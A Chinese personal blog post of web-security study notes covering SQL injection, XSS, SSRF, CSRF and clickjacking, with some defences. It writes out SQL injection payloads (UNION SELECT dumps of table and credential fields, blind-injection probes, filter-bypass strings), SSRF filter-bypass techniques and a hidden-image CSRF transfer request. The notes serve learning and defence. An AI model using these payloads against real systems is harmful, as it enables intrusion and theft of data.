<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="false" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  

  
  <title>Web安全学习笔记 | crumbling&#39;s secret room</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <link rel="preload" href="/css/fonts/Roboto-Regular.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/Roboto-Bold.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/MaterialSymbolsRounded.woff2" as="font" type="font/woff2" crossorigin="anonymous">

  <meta name="description" content="学了好长一段时间开发，SpringBoot相关内容基本学完了（感觉只是正常学完的水平），想背八股找个实习做做看，但学长一说最近又有些动摇是不是可以转做web安全，毕竟开发感觉还是蛮无聊的。 总之沉淀一下吧，可能会两边都一起准备。 目录  OWASP SQLi  XSS  SSRF  PHP  Clickjacking  CORS HTTP Python JavaScript Go Linux Gi">
<meta property="og:type" content="article">
<meta property="og:title" content="Web安全学习笔记">
<meta property="og:url" content="http://example.com/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="crumbling&#39;s secret room">
<meta property="og:description" content="学了好长一段时间开发，SpringBoot相关内容基本学完了（感觉只是正常学完的水平），想背八股找个实习做做看，但学长一说最近又有些动摇是不是可以转做web安全，毕竟开发感觉还是蛮无聊的。 总之沉淀一下吧，可能会两边都一起准备。 目录  OWASP SQLi  XSS  SSRF  PHP  Clickjacking  CORS HTTP Python JavaScript Go Linux Gi">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/ct_htmltree.gif">
<meta property="og:image" content="http://example.com/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/image-20240529152554853.png">
<meta property="og:image" content="http://example.com/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/relatation.png">
<meta property="article:published_time" content="2024-05-24T06:54:40.652Z">
<meta property="article:modified_time" content="2024-06-10T10:28:43.066Z">
<meta property="article:author" content="crumbling">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/ct_htmltree.gif">
  
    <link rel="alternate" href="/atom.xml" title="crumbling's secret room" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head>

<body>
  
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>crumbling's secret room </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS 订阅">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="搜索" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS 订阅">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">crumbling </div>
      <div class="dot"></div>
      <div class="subtitle">This is the subtitle </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://steamcommunity.com/profiles/76561199334949091/" title="Steam"><i class="fa-brands fa-steam"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/fcrumbling" title="GitHub"><i class="fa-brands fa-github"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      



    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">标签</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Crypto/" rel="tag">Crypto</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Web/" rel="tag">Web</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/gb%E5%9F%BA/" rel="tag">gb基</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/hnp/" rel="tag">hnp</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%A0%BC%E5%AF%86%E7%A0%81/" rel="tag">格密码</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E6%B7%B1%E5%BA%A6%E6%90%9C%E7%B4%A2/" rel="tag">深度搜索</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E7%9B%B8%E5%85%B3%E6%98%8E%E6%96%87%E6%94%BB%E5%87%BB/" rel="tag">相关明文攻击</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E8%83%8C%E5%8C%85%E9%97%AE%E9%A2%98/" rel="tag">背包问题</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E8%87%AA%E6%88%91%E4%BB%8B%E7%BB%8D/" rel="tag">自我介绍</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%9B%85%E5%85%8B%E6%AF%94%E7%AC%A6%E5%8F%B7/" rel="tag">雅克比符号</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/%E9%AB%98%E6%96%AF%E5%90%AF%E5%8F%91%E5%BC%8F/" rel="tag">高斯启发式</a></li></ul>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">归档</h3>
      
      
        <a class="archive-link" href="/archives/2024/05 ">
          五月 2024 
          <div class="archive-count">3 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/12 ">
          十二月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/11 ">
          十一月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/10 ">
          十月 2023 
          <div class="archive-count">1 </div>
        </a>
      
        <a class="archive-link" href="/archives/2023/09 ">
          九月 2023 
          <div class="archive-count">5 </div>
        </a>
      
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">最新文章</h3>
      <ul>
        
          <a class="recent-link" href="/2024/05/29/Java%E5%AE%89%E5%85%A8/" title="Java安全" >
            <div class="recent-link-text">
              Java安全
            </div>
          </a>
        
          <a class="recent-link" href="/2024/05/27/Portswigger%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/" title="PortSwigger靶场记录" >
            <div class="recent-link-text">
              PortSwigger靶场记录
            </div>
          </a>
        
          <a class="recent-link" href="/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="Web安全学习笔记" >
            <div class="recent-link-text">
              Web安全学习笔记
            </div>
          </a>
        
          <a class="recent-link" href="/2023/12/20/%E5%BC%BA%E7%BD%91%E6%9D%AF2023-crypto-%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/" title="强网杯2023-crypto-部分复现" >
            <div class="recent-link-text">
              强网杯2023-crypto-部分复现
            </div>
          </a>
        
          <a class="recent-link" href="/2023/11/02/2023ACTF-crypto%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/" title="2023ACTF——Crypto题目复现" >
            <div class="recent-link-text">
              2023ACTF——Crypto题目复现
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-Web安全学习笔记" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        Web安全学习笔记
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2024-05-24T06:54:40.652Z" itemprop="datePublished">2024-05-24</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
    未分类 
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            7.6k 词 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web/" rel="tag">Web</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <p>学了好长一段时间开发，SpringBoot相关内容基本学完了（感觉只是正常学完的水平），想背八股找个实习做做看，但学长一说最近又有些动摇是不是可以转做web安全，毕竟开发感觉还是蛮无聊的。</p>
<p>总之沉淀一下吧，可能会两边都一起准备。</p>
<p><strong>目录</strong></p>
<ul>
<li><a href="#2">OWASP</a></li>
<li><p><a href="#sql">SQLi</a></p>
</li>
<li><p><a href="#xss">XSS</a></p>
</li>
<li><p><a href="#ssrf">SSRF</a></p>
</li>
<li><p><a href="#php">PHP</a></p>
</li>
<li><p><a href="#clickjacking">Clickjacking</a></p>
</li>
<li><a href="#cors">CORS</a></li>
<li><a href="#http">HTTP</a></li>
<li><a href="#python">Python</a></li>
<li><a href="#js">JavaScript</a></li>
<li><a href="#go">Go</a></li>
<li><a href="#linux">Linux</a></li>
<li><a href="#git">Git</a></li>
<li><a href="#aqsb">安全设备</a></li>
<li><a href="#Other">Other</a></li>
<li><a href="#">参考</a></li>
</ul>
<h1 id="OWASP"><a href="#OWASP" class="headerlink" title="OWASP"></a><h1 id="2">OWASP</h1></h1><p>OWASP Top10 阅读<a target="_blank" rel="noopener" href="https://owasp.org/Top10/zh_CN/">首頁 - OWASP Top 10:2021</a></p>
<h1 id="SQLi"><a href="#SQLi" class="headerlink" title="SQLi"></a><h1 id="sql">SQLi</h1></h1><p>属于<strong>A03:2021-注入式攻击</strong></p>
<h2 id="SQL注入方法"><a href="#SQL注入方法" class="headerlink" title="SQL注入方法"></a>SQL注入方法</h2><h3 id="有回显的SQL注入"><a href="#有回显的SQL注入" class="headerlink" title="有回显的SQL注入"></a>有回显的SQL注入</h3><p>可以在应用程序的输出中看到数据库的查询结果</p>
<blockquote>
<p>通过sql注入，利用mysql自带得到库去获得敏感信息，然后获得更多的数据</p>
</blockquote>
<h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><p>无回显SQL注入</p>
<p>主要是通过<code>if(expression,if_true,if_false)</code>+正则匹配+枚举爆破的方式来找出数据</p>
<blockquote>
<p>if(DATABASE() rlike ‘^{exp}’,1,0) # 获取数据库名</p>
<p>if((SELECT GROUP_CONCAT(table_name, ‘:’, column_name) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE()) rlike ‘^{exp}’,1,0) # 获取表名与字段名</p>
<p>if((SELECT binary GROUP_CONCAT(secret_string) FROM secret) rlike ‘^{exp}’,1,0) # 获取存储的数据</p>
</blockquote>
<p>当然，因为用AND连接if语句，所以很显然需要保证另一个式子要结果稳定，这也就能引出适用范围更广的时间盲注</p>
<h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><p>TODO 没有实践成功，windows下signal的方式不行</p>
<p>无回显SQL注入</p>
<p>通过延时函数sleep，控制查询时间到的长短（超时返回一个报错去catch）来判断if语句真假</p>
<h3 id="基于报错的-SQL-注入-TODO"><a href="#基于报错的-SQL-注入-TODO" class="headerlink" title="基于报错的 SQL 注入 TODO"></a>基于报错的 SQL 注入 TODO</h3><p>捕获报错信息进行sql注入，报错注入需要利用函数，以及其相应的攻击方法</p>
<h3 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h3><p>当注入点允许一次性执行多个 SQL 语句。而且不仅限于 SELECT ， INSERT、SHOW、SET、UPDATE 等也都可以。</p>
<h3 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h3><p>简单来说，第一层是安全的，但是第二层没有响应的检查过滤等，那么第一层如果放过的数据里有注入内容，在第二层的时候就可以重复上述或其他的注入方法进行注入</p>
<h2 id="技巧"><a href="#技巧" class="headerlink" title="技巧"></a>技巧</h2><h3 id="判断注入类型和闭合方式"><a href="#判断注入类型和闭合方式" class="headerlink" title="判断注入类型和闭合方式"></a>判断注入类型和闭合方式</h3><p>使用数据 <code>1、1&#39;、1&#39; &#39;</code></p>
<h3 id="联查判断列数"><a href="#联查判断列数" class="headerlink" title="联查判断列数"></a>联查判断列数</h3><p><code>&#39; order by 1,2 ;&#39;</code> (order by 用于排序1,2表示优先按照哪些列来排，超出列数就会报错)</p>
<h3 id="返回判断"><a href="#返回判断" class="headerlink" title="返回判断"></a>返回判断</h3><p><code>&#39; union select 1,2,3;&#39;</code>观察返回哪些数，可以看到哪些列是被返回显示的,这里有很多操作空间，比如用load_file这样的函数去读取文件等等</p>
<h3 id="字符串表名"><a href="#字符串表名" class="headerlink" title="字符串表名"></a>字符串表名</h3><p>加个反引号</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27;;show columns from `1919810931114514`;#</span></span><br></pre></td></tr></table></figure>
<h3 id="突出union内容"><a href="#突出union内容" class="headerlink" title="突出union内容"></a>突出union内容</h3><p>and 1=2让原本的内容查不出来</p>
<h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>在确定哪些列被返回的基础上，可以将返回显示的改为特定方法，以返回一些数据</p>
<p><code>datebase()</code>返回数据库名</p>
<p><code>&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;news&#39;;&#39;</code>      返回数据库下的数据表名</p>
<p><code>1&#39; union select 1, group_concat(column_name), 3 from information_schema.columns where table_name=&quot;secret_table&quot; ;&#39;</code>返回数据库的字段名</p>
<p><code>1&#39; union select 1, fl4g, 3 from secret_table ;&#39;</code>查询字段值</p>
<p><code>1,group_concat(no,username,passwd,data),3,4 fromusers</code>查询字段值</p>
<h3 id="SQL-注入常见的过滤绕过方式"><a href="#SQL-注入常见的过滤绕过方式" class="headerlink" title="SQL 注入常见的过滤绕过方式"></a>SQL 注入常见的过滤绕过方式</h3><p>很显然过滤是为了防止sql注入，那也就意味着只要通过合适的方法绕过过滤，就可以正常进行注入了。</p>
<h4 id="select等关键字被过滤"><a href="#select等关键字被过滤" class="headerlink" title="select等关键字被过滤"></a>select等关键字被过滤</h4><p><code>1&#39;; show datebase();#</code> 可能只过滤了那一段sql，堆叠注入可能就不被过滤了</p>
<h4 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h4><p>比如说<code>select</code>被过滤为空，可以用<code>selecselectt</code>替代</p>
<p>如：<code>filename=&quot;a&#39;+(CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here)),1,12),16,10))+&#39;.jpg</code></p>
<h1 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a><h1 id="xss">XSS</h1></h1><p>跨站脚本（Cross-site scripting）</p>
<p>属于<strong>A03:2021-注入式攻击</strong></p>
<blockquote>
<p>通过利用网页开发时留下的漏洞，注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。</p>
</blockquote>
<h2 id="类型"><a href="#类型" class="headerlink" title="类型"></a>类型</h2><h3 id="反射型（非持久型）XSS"><a href="#反射型（非持久型）XSS" class="headerlink" title="反射型（非持久型）XSS"></a>反射型（非持久型）XSS</h3><blockquote>
<p>反射型 XSS 一般可以由攻击者构造带有恶意代码参数的 URL 来实现，在构造的URL 地址被打开后，其中包含的恶意代码参数被浏览器解析和执行。</p>
<p>这种攻击的特点是非持久化，必须用户点击包含恶意代码参数的链接时才会触发。</p>
</blockquote>
<p>原理：用户的输入或可控参数被未经处理就输出到页面，就容易产生该漏洞</p>
<p>常出现在搜索等功能，可以利用搜索框执行一些程序语言的命令</p>
<h3 id="存储型（持久型）XSS"><a href="#存储型（持久型）XSS" class="headerlink" title="存储型（持久型）XSS"></a>存储型（持久型）XSS</h3><blockquote>
<p>不需要特制的链接来执行。仅需要提交 XSS 漏洞利用代码（反射型XSS通常只在url中）到一个网站上其他用户可能访问的地方。</p>
<p>这些地区可能是<code>博客评论，用户评论，留言板，聊天室，HTML 电子邮件，wikis</code>。一旦用户访问受感染的页，执行是自动的。</p>
</blockquote>
<p>其原理和反射型类似，但是恶意代码会被保存到服务器中，比如说留言板被注入了恶意代码，每次跳转到留言板就会触发代码</p>
<p>最常发生在由社区内容驱动的网站或 Web 邮件网站</p>
<h3 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h3><h4 id="什么是DOM"><a href="#什么是DOM" class="headerlink" title="什么是DOM"></a>什么是DOM</h4><p>DOM指的是DOM文档，也就是一份xml文档，可以将前端html的代码化为一个树状结构，方便程序和脚本能够轻松的动态访问和更新这个树状结构的内容、结构以及样式，且不需要经过服务端。</p>
<p>如图是一个HTML DOM 树：</p>
<p><img src="/2024/05/24/Web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/ct_htmltree.gif" alt="DOM HTML tree"></p>
<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p>DOM有一个source和sink，可以理解为DOM操作函数的入口点和出口点，基于DOM的XSS就是因为将入口点的输入传递给出口点的时候被出口点函数执行导致的XSS。</p>
<p>DOM型xss可以在前端通过js渲染来完成数据的交互，达到插入数据造成xss脚本攻击，且不经过服务器的目的，属于前端js的漏洞，可以达到绕过WAF、躲避服务端的检测效果，而反射型和存储型显然都是需要与服务器进行交互的。</p>
<h4 id="如何测试基于DOM的XSS？"><a href="#如何测试基于DOM的XSS？" class="headerlink" title="如何测试基于DOM的XSS？"></a>如何测试基于DOM的XSS？</h4><ul>
<li>测试HTML sink</li>
<li>测试JS执行 sink</li>
</ul>
<p><strong>测试HTML sink</strong></p>
<p>测试HTML sink需要在sink处填充随机字母数字，然后观察在HTML页面中的位置。然后观察其上下文，调整payload以观察是否能够将内容从当前标签中脱离出来。</p>
<p><strong>测试JS执行sink</strong></p>
<p>测试JS执行sink比测试HTML sink困难一点，因为可能sink的输入不会显示在页面中，这就需要在sink处下断点进行调试，跟踪变量值的变化，可能sink的输入会赋给其他变量，剩下的操作与上面相同，依然是不断调整输入以触发XSS。</p>
<p>典例如：</p>
<ul>
<li>HTML类的——搜索结果直接放入img元素中返回，就可以提前闭合img并执行恶意代码。</li>
</ul>
<h3 id="通用型XSS"><a href="#通用型XSS" class="headerlink" title="通用型XSS"></a>通用型XSS</h3><h3 id="突变型XSS"><a href="#突变型XSS" class="headerlink" title="突变型XSS"></a>突变型XSS</h3><h1 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a><h1 id="ssrf">SSRF</h1></h1><h2 id="什么是SSRF"><a href="#什么是SSRF" class="headerlink" title="什么是SSRF"></a>什么是SSRF</h2><blockquote>
<p>SSRF(服务器端请求伪造)是种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下SSRF攻击的目标是从外网无法访问的内部系统，比如说无法直接从外网访问的flag.php文件，访问内网的MySQL数据库等</p>
<p>成因大都是服务端提供了从其他服务器应用获取数据的功能，并且没有对目标地址进行过滤限制，如从指定url获取网页文本内容，加载指定地址的图片，下载等</p>
</blockquote>
<h2 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h2><p>（为可能出现的场景，因为如果做好了过滤和限制，也是不会出现的）</p>
<ul>
<li>分享功能（获取超链接url的标题等并展示）</li>
<li>在线翻译（给url翻译对应网页的内容）</li>
<li>从远程服务器请求资源</li>
</ul>
<h2 id="判断是否存在ssrf"><a href="#判断是否存在ssrf" class="headerlink" title="判断是否存在ssrf"></a>判断是否存在ssrf</h2><ul>
<li><p>查看是否是在本地进行了资源地址类型为 <code>http://www.xxx.com/a.php?image=URL</code>等URL参数为其他服务器地址的请求，就可能存在SSRF漏洞</p>
<blockquote>
<p>可以通过<code>127.0.0.1</code>或通过伪协议进行内网资源的访问</p>
</blockquote>
</li>
<li><p>自动化工具进行测试</p>
</li>
<li><p>其他</p>
</li>
</ul>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><ol>
<li>利用ssrf对内网进行端口扫描或目录扫描（比如说访问<code>127.0.0.1:target</code>）target为爆破参数，这点完全可以通过burpsuite实现</li>
<li>利用ssrf进行sql注入，思路是一样的，注入点在url参数的位置，需要注意将空格进行两次url编码</li>
<li>利用gopher协议发送get/post请求<code>gopher://&lt;host&gt;:&lt;port&gt;/&lt;gopher-path&gt;_&lt;TCP数据流&gt;</code>，或攻击内网应用如Redis</li>
<li>file协议读取本地文件</li>
</ol>
<h2 id="防御-绕过"><a href="#防御-绕过" class="headerlink" title="防御/绕过"></a>防御/绕过</h2><ul>
<li><strong>限制IP</strong>，可以考虑进制转换改写成其他进制、进制混用，或者合并后2-3位</li>
<li><strong>解析到内网的域名</strong>，简单来说就是没有先解析，而是先过滤再解析，那么<code>localhost</code>等就会解析到内网ip进行攻击，另外<code>xip.io</code>的子域名会解析到对应的IP，<code>192.168.0.1.xip.io</code>解析后即为<code>192.168.0.1</code></li>
<li><strong>@绕过</strong>，<code>http://www.baidu.com@10.10.10.10</code>与<code>http://10.10.10.10</code>是相同的</li>
<li><strong>302跳转，307跳转</strong></li>
<li><strong>非HTTP协议</strong>，常见如gopher</li>
<li><strong>DNS重绑定</strong>，常见的防御是对于用户请求的参数先进行DNS解析，再对从DNS服务器返回的ip进行判断，如果在黑名单中则禁止请求。DNS Rebinding利用的是两次去DNS服务请求解析域名的时间差。<ul>
<li>服务器端获得URL参数，进行第一次DNS解析（该域名的解析需要指定到攻击者可控的DNS Server），获得了一个非内网的IP</li>
<li>对于获得的IP进行判断，发现为非黑名单IP，通过验证</li>
<li>服务器端对URL访问，由于DNS服务器（攻击者可控的）设置的TTL为0，于是再次进行DNS解析，这一次返回内网地址。</li>
<li>由于验证已经通过，所以服务器端访问内网资源并返回结果。</li>
</ul>
</li>
<li><strong>其他</strong></li>
</ul>
<h1 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a><h1 id="csrf">CSRF</h1></h1><p>跨站请求伪造，是OWASP（Open Web Application Security Project）2021年<strong>A01：失效的[访问控制]</strong>中常见的CWE之一</p>
<blockquote>
<p>CSRF攻击是一种网络攻击方式，攻击者通过伪造用户身份，在用户毫不知情的情况下，以用户的名义发送恶意请求给受攻击站点。这些请求在权限保护之下执行，对用户和网站造成严重的危害。</p>
</blockquote>
<p>简单来说是攻击者在一个网站上伪造请求，以便在另一个网站上执行操作。</p>
<blockquote>
<p>例如，Jane 可能会在查看电子邮件的同时登录了她的网上银行，然后可能会点进钓鱼邮件中的自带转账请求的链接（比如迷惑性的短链接），要求 Jane 的银行转账至被攻击者控制的账户里。</p>
<p>由于 Jane 已经登陆了银行，该转账请求会被自动执行，因为是通过已被 Jane 授权了的浏览器发出的请求。</p>
</blockquote>
<h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><p>CSRF攻击利用了Web的身份验证机制的缺陷。虽然Web的身份验证机制可以保证一个请求是来自某个用户的浏览器，但却无法保证该请求是用户批准发送的。攻击者通过在第三方网站上放置恶意代码，诱导用户访问被攻击的网站并完成恶意请求。整个过程用户并不知情，因此很难防范。</p>
<h3 id="类型-1"><a href="#类型-1" class="headerlink" title="类型"></a>类型</h3><h3 id="GET"><a href="#GET" class="headerlink" title="GET"></a>GET</h3><p>CSRF的本质原因是重要操作的所有参数都是可以被攻击者猜测到的。</p>
<p>比如说攻击者猜到银行转账使用以下GET请求完成转账</p>
<p><code>http://www.bank.com/Transfer.php?toName=username&amp;money=1</code></p>
<p>而在危险站点中有这样一段html</p>
<p><code>&lt;img src=http://www.bank.com/Transfer.php?toName=Hacker&amp;money=100000&gt;</code></p>
<p>一般来说都是受害者登录受信任站点A，并在本地生成Cookie（放在浏览器中）。在不登出A的情况下，访问危急站点B。</p>
<p>那么，账户里就会少100000块钱。</p>
<p>常使用HTML中<code>&lt;image&gt;、&lt;iframe&gt;、&lt;script&gt;</code>等带“src”属性的标签</p>
<h3 id="POST"><a href="#POST" class="headerlink" title="POST"></a>POST</h3><p>如果不对请求方法进行限制，那么依然可以通过构造GET请求完成CSRF,但如果已经区分，那么最简单的方法就是提前构造好一个表单，利用js自动提交表单</p>
<p>攻击者的这个页面可以隐藏在一个不可见的iframe窗口中，让用户发现不了</p>
<h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><h4 id="1-检测"><a href="#1-检测" class="headerlink" title="1.检测"></a>1.检测</h4><p>验证请求的来源地址。可以通过检查请求头部中的Referer字段来判断请求的来源，如果请求的来源地址与目标地址不一致，则可能存在CSRF攻击。</p>
<p>如果Referer字段为空或者与目标地址不一致，也可能会是CSRF攻击。</p>
<h4 id="2-防范手段"><a href="#2-防范手段" class="headerlink" title="2.防范手段"></a>2.防范手段</h4><ul>
<li><strong>添加token验证。</strong>在用户登录后生成token并存储在session中（印象里现在是不是jwt更多一些？），然后在处理敏感操作的时候对token进行验证【这里衍生出很多相关的攻击，可见靶场的题目记录】</li>
<li><strong>二次验证。</strong>在关键操作之前，要求用户提供当前密码或验证码进行验证。这种方法虽然会对用户体验产生影响，但对于高敏感度的操作来说，却是非常有效的防护手段。</li>
<li><strong>配置HTTP头部信息。</strong>例如，设置合适的Content-Security-Policy头部可以限制浏览器加载资源的来源，从而降低CSRF攻击的风险。</li>
</ul>
<h1 id="Clickjacking"><a href="#Clickjacking" class="headerlink" title="Clickjacking"></a><h1 id="clickjacking">Clickjacking</h1></h1><p>点击劫持</p>
<p>属于<strong>A06:2021 - Vulnerable and Outdated Components</strong>（<strong>危险或过旧的组件</strong>）下的一种威胁，与UI相关的安全问题密切相关</p>
<h2 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h2><p>攻击者通过使用一个透明的iframe，覆盖在一个网页上，然后诱使用户在该页面上进行操作，通过调整iframe页面的位置，可以使得伪造的页面恰好和iframe里受害页面里一些功能重合（比如说按钮、超链接）。</p>
<p>Clickjacking是仅此于XSS和CSRF的前端漏洞。</p>
